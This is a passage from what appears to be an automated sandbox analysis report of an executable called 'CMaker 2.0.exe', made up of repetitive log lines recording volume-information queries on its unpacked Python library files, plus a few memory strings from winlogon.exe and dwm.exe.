                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                        Source: winlogon.exe, 00000013.00000000.2318423124.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000013.00000002.3486405591.000002D016A61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000017.00000000.2344128156.000001D154AB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeCode function: 2_2_00007FF6FAC09650 cpuid 2_2_00007FF6FAC09650
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\certifi VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\certifi VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\libcrypto-3.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\libffi-8.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\VCRUNTIME140.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe VolumeInformationJump to behavior
